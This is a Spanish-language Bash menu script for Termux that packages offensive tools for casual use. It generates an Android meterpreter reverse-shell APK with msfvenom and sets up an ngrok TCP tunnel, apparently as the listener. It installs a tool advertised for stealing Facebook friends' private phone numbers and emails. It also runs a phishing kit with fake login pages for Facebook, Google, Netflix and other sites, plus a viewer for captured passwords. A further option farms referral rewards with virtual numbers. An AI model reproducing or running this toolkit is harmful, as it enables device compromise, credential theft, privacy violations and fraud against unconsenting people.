#!/bin/bash


rode="\e[31m"
ro="\e[1;31m"
ne="\e[30m"
gr="\e[1;30m"
azde="\e[34m"
az="\e[1;34m"
vede="\e[32m"
ve="\e[1;32m"
cede="\e[36m"
ce="\e[1;36m"
pude="\e[35m"
pu="\e[1;35m"
amde="\e[33m"
am="\e[1;33m"
grde="\e[37m"
bl="\e[1;37m"
re="\e[0m"

bgn="\033[40m"
bgr="\033[41m"
bgv="\033[42m"
bga="\033[43m"
bgaz="\033[44m"
bgm="\033[45m"
bgc="\033[46m"
bgb="\033[47m"



clear
printf "

 $bgr        $re     $bgr    $re     $bgr        $re  $bgr     $re
 $bgr   $re         $bgr  $re  $bgr  $re       $bgr  $re     $bgr  $re   $bgr  $re
 $bga   $re        $bga  $re    $bga  $re      $bga  $re     $bga  $re    $bga  $re
 $bga        $re  $bga  $re      $bga  $re     $bga  $re     $bga  $re    $bga  $re
       $bgv  $re  $bgv          $re     $bgv  $re     $bgv  $re    $bgv  $re
       $bgv  $re  $bgv  $re      $bgv  $re     $bgv  $re     $bgv  $re  $bgv  $re
 $bgc        $re  $bgc  $re      $bgc  $re  $bgc        $re  $bgc     $re"
echo
printf "
$ce[$ve 01$ce ]$am Instalar la herramienta Metasploit $re
$ce[$ve 02$ce ]$am Generar payload infectado con .apk $re
$ce[$ve 03$ce ]$am Ganar automáticamente saldo PayPal $re
$ce[$ve 04$ce ]$am Reproductor para música de YouTube $re
$ce[$ve 05$ce ]$am Robar correo y numeros de Facebook $re
$ce[$ve 06$ce ]$am Hacer Phishing para Redes Sociales $re
$ce[$ve 07$ce ]$am Descarga Ngrok sin errores de port $re
$ce[$ve 99$ce ]$am Desactiva este script de tu termux $re
"
echo

if [ $1 -z ]; then
	read -p ">> " opc
else
	opc=$1
fi
function no_sonar {
mpv /data/data/com.termux/files/usr/lib/.int > /dev/null 2>&1
}


case $opc in

01|1)
cd
said-update
cd
clear
printf "
$ve INICIANDO...$re"
pkg update -y
pkg upgrade -y
pkg install unstable-repo -y
pkg install metasploit -y
;;










02|2)
        clear
	printf "$am"
	read -p "LHOST:  " host
	read -p "LPORT:  " port
	read -p "Nombre (sin .apk):  " name
	printf "$re"
        msfvenom -p android/meterpreter/reverse_tcp LHOST=$host LPORT=$port R > /sdcard/$name.apk
	echo
	echo
	printf "$ve [ + ]$am el apk se guardo en la ruta:

	/sdcard/$name.apk
	"
;;










03|3)
cd
said-update
clear
printf "
$ve [ > ]$am Descarga la app$ve BIGtoken$am a continuacion...$re
$az presiona$ve ENTER$az para descargar$re"
read -p " >" xjd1762
termux-open https://play.google.com/store/apps/details?id=com.bigtoken.consumer
echo
echo
echo
printf "
$ve [ > ]$am Descarga la app$ve Text Plus$am a continuacion...$re
$az presiona$ve ENTER$az para descargar$re"
read -p " >" xjd1763
termux-open https://play.google.com/store/apps/details?id=com.gogii.textplus
clear
printf "
$ro AHORA SIGUE LOS PASOS$re

$ve [ paso 1 ]$az  Ve a Text Plus y create un nuevo numero virtual

$ve [ paso 2 ]$az Ve a BIGtoken y create una cuenta nueva colocando los datos que te solicitan y el numero virtual recien credo, ademas puedes usar el codigo de referido$bl DISBAN$az para evitar futuros problemas y ademas para que no empieces en cero puntos

$ve [ paso 3 ]$az A continuacion presiona$ve ENTER$az para continuar y seguido coloca el correo y contraseña de la cuenta de BIGtoken, Posterior a eso preciona la letra$am Y$az y das enter y despues preciona el numero$bl 2$az y das enter
$ro Nota;$grde Despues de cerrar termux, si quieres volver a generar dinero solo coloca el comando$pu bt$grde en tu terminal, y despues la letra$am Y$grde y enter y lueho el numero$am 2$grde y enter (haslo 1 vez cada 24 horas)

$ce presiona$ve ENTER$ce para continuar...$re"
read -p " >" hgfert45
cd; pkg update -y; pkg upgrade -y; pkg install git -y; git clone https://github.com/SaidGR/BIGtoken.git; cd BIGtoken; chmod 777 inc; ./inc
;;










04|4)
        said-update
        clear
	pkg update -y
	pkg upgrade -y
	pkg install python
	pip install mps-youtube
	pip install youtube_dl
	apt install mpv
	printf "
$ve [ + ]$az Instalado con exito, cada vez que quieras escuchar musica solo coloca el comando$am mpsyt$az y para buscar los videos recuerda utilizar la barra inclinada. Ejemplo;
$gr /nombre del video$re"
;;










	


05|5)
        said-update
        clear
        printf "
$ve Instalando la herramienta, con ella podrás sacar los números y correos de tus amigos de facebook, aun que los tengan privados 
$re"
        sleep 5
        cd
        pkg update -y
        pkg upgrade -y
        pkg install python -y
        pkg install python 2 -y
        pkg install git -y
        cd
        git clone https://github.com/CiKu370/OSIF
        cd OSIF
        pip2 install -r requirements.txt
        pip2 install requests
        clear
	printf "
$ce A continuacion coloca el comando token... y seguido colocaremos nuestro usuario y contraseña de facebook $re



$re"
        cd
        cd OSIF
	python2 osif.py
        clear
        printf "
$ve LISTO,$ce coloca el comando$am said fb$ce cada vez que quieras utilizar la herramienta
$re"
;;
fb)
        clear
        printf "
$ro Comandos básicos:$re

$ce dump_phone$am roba los números de tus amigos
$ce dump_mail$am  roba los correos de tus amigos

$az coloca$am help$az para más opciones ⬇



$re"
        cd
        cd OSIF
        python2 osif.py
;;










06|6)
if [ -x $HOME/scam ];then
cd
said psi
else
said-update
clear
cd
apt update -y
apt upgrade -y
pkg install git -y
git clone https://github.com/Cesar-Hack-Gray/scam
cd
cd scam
bash install.sh
clear
printf "
$ve LISTO,$am ejecuta el comando$ve said psi$am cada vez que quieras hacer un pishing de alguna página... 
$re"
fi
;;
psi|pesi)
clear
printf "

$bgb$ro ELIGE EL PHISHING QUE QUIERAS HACER $re

$ce[$ve 0$ce ]$am Phishing para facebook en computadora
$ce[$ve 1$ce ]$am Phishing para Facebook en celular
$ce[$ve 2$ce ]$am Phishing para Facebook \"por bloqueo\" 
$ce[$ve 3$ce ]$am Phishing para Facebook \"auto likes\" 
$ce[$ve 4$ce ]$am Phishing para Instagram
$ce[$ve 5$ce ]$am Phishing para google
$ce[$ve 6$ce ]$am Phishing para Netflix 
$ce[$ve 7$ce ]$am Phishing para Spotify
$ce[$ve 8$ce ]$am Phishing para Twiter \"auto seguidores\"
$ce[$ve 9$ce ]$am Phishing para YouTube \"auto suscriptores\"
$ce[$ve a$ce ]$am Ver tus phishings anteriores
$re"
read -p ">>  " opcion
cd
cd scam
case $opcion in
0)
./phishing.sh --use -facebook-pc
;;
1)
./phishing.sh --use -Facebook
;;
2)
./phishing.sh --use -facebook-bloqueo
;;
3)
./phishing.sh --use -Facebook-auto-likes
;;
4)
./phishing.sh --use -instagram
;;
5)
./phishing.sh --use -google
;;
6)
./phishing.sh --use -netflix
;;
7)
./phishing.sh --use -spotify
;;
8)
./phishing.sh --use -twiter-auto-seguidores
;;
9)
./phishing.sh --use -Youtube-auto-suscriptores
;;
a) 
./phishing.sh --ver -passwords
;;
esac
;;








07|7)
clear
printf "
$ce Acontinuación ve a ngrok, inicia sesión y copia el authoken del paso #3$ve
" 
read -p "authtoken: " token
printf "$re" 
cd
cd ..
git clone https://github.com/SaidGR/ngrok.git > /dev/null 2>&1
cd ngrok
mv ng $HOME
rm -Rf ngrok
cd
rm -Rf ngrok > /dev/null 2>&1
cd .. 
mv ng $HOME/ngrok-stable-linux-arm.zip
cd
chmod 777 ngrok-stable-linux-arm.zip
unzip ngrok-stable-linux-arm.zip
cp ngrok /data/data/com.termux/files/usr/bin
cd
$token
clear
printf "$ve LISTO...$re


$gr Puedes usar ngrok sin problemas, siempre y cuando no lo actualizes.

Puedes automatizar el proceso con el comando$ve said ngrok$gr el cual creará el túnel tcp con el puerto 5555$re"
;;
ngrok) 
cd
ngrok tcp 5555
;;

 









99)
cd
cd ../usr/etc
rm -Rf bash.bashrc
mv motd1 motd
cd
cd SG
mv .exc.sh ../../usr/etc
cd
cd ../usr/etc
mv .exc.sh bash.bashrc
cd
rm -Rf SG
cd
cd ../usr/bin
rm -Rf said
rm -Rf said-update
cd
;;
cd) 
cd
ls
;;
ls) 
ls
;;
said-update|update|-update) 
cd
said-update
;;

help)
printf "$ro$bgb Comandos aparte del menú $re

$ce[$ve+$ce]$gr Estos comandos requieren de instalar sus respectivas herramientas del menú... No funcionan sin su instalación previa
$re

$bgb$ro================================$re
$bgb$ro bt $ve Genera automatizadamente dinero para PayPal 

$bgb$ro mpsyt $ve Activa el reproductor de Youtube cada vez que lo quieras utilizar

$bgb$ro fb $ve Activa la herramienta para robar correos y números de nuestros amigos de Facebook

$bgb$ro psi $ve Activa la herramienta de phishing para las diferentes redes sociales y paginas

$bgb$ro ngrok $ve Genera un túnel tcp de NGROK con el puerto 5555

$bgb$ro state $ve Crea la carpeta Estados.by.Said en la cual podemos ver los estados de whatsapp descargados
$re"
;;

state)
cd
cd /sdcard/WhatsApp/Media
cp -r .Statuses ../..
cd ../..
rm -Rf Estados.by.Said
mv .Statuses Estados.by.Said
cd
clear
printf "
$az Los Estados se guerdaron en la ruta:
$am /sdcard/Estados.by.Said $re
"
;;
esac
